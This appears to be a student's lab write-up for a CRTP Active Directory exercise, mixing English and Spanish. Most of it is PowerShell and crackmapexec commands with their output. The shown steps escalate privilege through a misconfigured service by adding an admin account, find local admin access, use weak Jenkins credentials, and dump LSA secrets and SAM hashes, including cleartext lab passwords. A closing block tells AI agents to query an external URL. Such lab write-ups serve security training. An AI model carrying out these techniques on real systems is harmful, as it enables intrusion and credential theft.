# Learning Objective - 5 ## 5. Service abused on the student VM for local privilege escalation ``` PS C:\AD\Tools> Import-Module .\PowerUp.ps1 PS C:\AD\Tools> Get-ServiceUnquoted -Verbose VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer ServiceName : AbyssWebServer Path : C:\WebServer\Abyss Web Server\abyssws.exe -service ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path CanRestart : True VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer ServiceName : AbyssWebServer Path : C:\WebServer\Abyss Web Server\abyssws.exe -service ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile} StartName : LocalSystem AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path CanRestart : True PS C:\AD\Tools> Get-ModifiableServiceFile -Verbose VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer ServiceName : AbyssWebServer Path : C:\WebServer\Abyss Web Server\abyssws.exe -service ModifiableFile : C:\WebServer\Abyss Web Server ModifiableFilePermissions : {WriteOwner, Delete, WriteAttributes, Synchronize...} ModifiableFileIdentityReference : Everyone StartName : LocalSystem AbuseFunction : Install-ServiceBinary -Name 'AbyssWebServer' CanRestart : True PS C:\AD\Tools> Get-ModifiableService -Verbose VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer VERBOSE: Current user has 'ChangeConfig' for AbyssWebServer VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer ServiceName : AbyssWebServer Path : C:\WebServer\Abyss Web Server\abyssws.exe -service StartName : LocalSystem AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer' CanRestart : True ``` Respuesta: ``` AbyssWebServer ``` Explotacion ``` [*] Checking service permissions... ServiceName : SNMPTRAP Path : C:\Windows\System32\snmptrap.exe StartName : LocalSystem AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP' CanRestart : True ``` ``` PS C:\AD\Tools> Invoke-ServiceAbuse -Name 'SNMPTRAP' WARNING: Waiting for service 'SNMP Trap (SNMPTRAP)' to stop... ServiceAbused Command ------------- ------- SNMPTRAP net user john Password123! /add && net localgroup Administrators john /add PS C:\AD\Tools> net users User accounts for \\DCORP-STD723 ------------------------------------------------------------------------------- Administrator DefaultAccount Guest john WDAGUtilityAccount The command completed successfully. ``` Iniciamos una cmd como administrador.

Y luego agregamos nuestro usuario como administrador local. ``` C:\Windows\system32>net localgroup Administrators dcorp\student723 /add The command completed successfully. C:\Windows\system32>net localgroup Administrators Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator dcorp\Domain Admins dcorp\student723 john The command completed successfully. ``` ## Script utilizado para buscar privilegios de administrador utilizando PowerShell Remoting Primer intento ``` PS C:\AD\Tools> Find-LocalAdminAccess -Verbose VERBOSE: [Find-LocalAdminAccess] Querying computers in the domain VERBOSE: [Get-DomainSearcher] search base: LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369)) VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed because [System.DirectoryServices.SearchResult] does not contain a method named 'dispose'. VERBOSE: [Find-LocalAdminAccess] TargetComputers length: 28 VERBOSE: [Find-LocalAdminAccess] Using threading with threads: 20 VERBOSE: [New-ThreadedFunction] Total number of hosts: 28 VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20 VERBOSE: [New-ThreadedFunction] Threads executing VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup... VERBOSE: [New-ThreadedFunction] all threads completed ``` Fallido. Segundo intento: ``` PS C:\AD\Tools> Get-NetComputer | select samaccountname samaccountname -------------- DCORP-DC$ DCORP-ADMINSRV$ DCORP-APPSRV$ DCORP-CI$ DCORP-MGMT$ DCORP-MSSQL$ DCORP-SQL1$ DCORP-STDADMIN$ DCORP-STD721$ DCORP-STD722$ DCORP-STD724$ DCORP-STD723$ DCORP-STD726$ DCORP-STD729$ DCORP-STD725$ DCORP-STD728$ DCORP-STD727$ DCORP-STD731$ DCORP-STD732$ DCORP-STD730$ DCORP-STD733$ DCORP-STD735$ DCORP-STD734$ DCORP-STD736$ DCORP-STD737$ DCORP-STD739$ DCORP-STD740$ DCORP-STD738$ ``` ``` PS C:\AD\Tools> .\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt ``` Fallido. Tercer intento: ``` PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1 PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess dcorp-std723 dcorp-adminsrv PS C:\AD\Tools> nslookup dcorp-adminsrv Server: UnKnown Address: 172.16.2.1 Name: dcorp-adminsrv.dollarcorp.moneycorp.local Address: 172.16.4.101 ``` {% code overflow="wrap" %} ``` PS C:\AD\Tools> Enter-PSSession -ComputerName dcorp-adminsrv -Credential dcorp\student723 [dcorp-adminsrv]: PS C:\Users\student723\Documents> whoami dcorp\student723 [dcorp-adminsrv]: PS C:\Users\student723\Documents> ls [dcorp-adminsrv]: PS C:\Users\student723\Documents> cd .. [dcorp-adminsrv]: PS C:\Users\student723> cd / [dcorp-adminsrv]: PS C:\> ls Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/8/2021 1:15 AM PerfLogs d-r--- 11/11/2022 12:55 AM Program Files d----- 5/8/2021 2:34 AM Program Files (x86) d----- 12/3/2023 6:36 AM Transcripts d-r--- 2/20/2024 4:42 PM Users d----- 1/10/2024 1:05 AM Windows ``` {% endcode %} ## Jenkins user used to access Jenkins web console

``` manager:manager ```

``` builduser:builduser ```

Link:

Luego obtenemos el resultado:

Respuesta: ``` builduser ``` ## Domain user used for running Jenkins service on dcorp-ci

Respuesta: ``` dcorp\ciadmin ``` Plus

``` crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --lsa SMB 172.16.3.11 445 DCORP-CI [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False) SMB 172.16.3.11 445 DCORP-CI [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!) SMB 172.16.3.11 445 DCORP-CI [+] Dumping LSA secrets SMB 172.16.3.11 445 DCORP-CI DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4efcdce983215 SMB 172.16.3.11 445 DCORP-CI DOLLARCORP.MONEYCORP.LOCAL/student723:$DCC2$10240#student723#eb5f214b28ad3157316b015e0ceb0dde SMB 172.16.3.11 445 DCORP-CI dcorp\DCORP-CI$:aes256-cts-hmac-sha1-96:8ec0804e2ed229f58336a750f8627490d3cdcb523de3031acfe4db47fb035073 SMB 172.16.3.11 445 DCORP-CI dcorp\DCORP-CI$:aes128-cts-hmac-sha1-96:00527bdd009fedf4f9e116f7270fd8be SMB 172.16.3.11 445 DCORP-CI dcorp\DCORP-CI$:des-cbc-md5:d08a1a1fabdfc789 SMB 172.16.3.11 445 DCORP-CI dcorp\DCORP-CI$:plain_password_hex:360056003d002b004c002600470051004e0055003b00220061007500280056004f00390025006a0071003c005f005e003d004600600033004a0071004d0043002200500021005100300068006f005b00490071005b002800430075006d005d007200530025006a004b004b00280023002d005d0064002d006800720049003c006e0042003600760056006f00220044004c00670045007700450059003a002a006300600051003e00600033003e005200430075006e002f0033005e0024007200630034004e002800650045006b0022002400570045007400770071005a0068005b00380026002f004b0048005c007400 SMB 172.16.3.11 445 DCORP-CI dcorp\DCORP-CI$:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3::: SMB 172.16.3.11 445 DCORP-CI dpapi_machinekey:0x4796c1a459d09e880ee84dc5958f1cdca366c808 dpapi_userkey:0xeba6b8fb6245f03382bff91e8fb6fd323080b80c SMB 172.16.3.11 445 DCORP-CI NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302 SMB 172.16.3.11 445 DCORP-CI dcorp\ciadmin:*ContinuousIntrusion123 SMB 172.16.3.11 445 DCORP-CI [+] Dumped 10 LSA secrets to /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.secrets and /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.cached ``` ``` crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --sam SMB 172.16.3.11 445 DCORP-CI [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False) SMB 172.16.3.11 445 DCORP-CI [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!) SMB 172.16.3.11 445 DCORP-CI [+] Dumping SAM hashes SMB 172.16.3.11 445 DCORP-CI Administrator:500:aad3b435b51404eeaad3b435b51404ee:deaa870c264c682aa1fbfc31ebe678a2::: SMB 172.16.3.11 445 DCORP-CI Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 172.16.3.11 445 DCORP-CI DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 172.16.3.11 445 DCORP-CI WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 172.16.3.11 445 DCORP-CI [+] Added 4 SAM hashes to the database ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-5.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.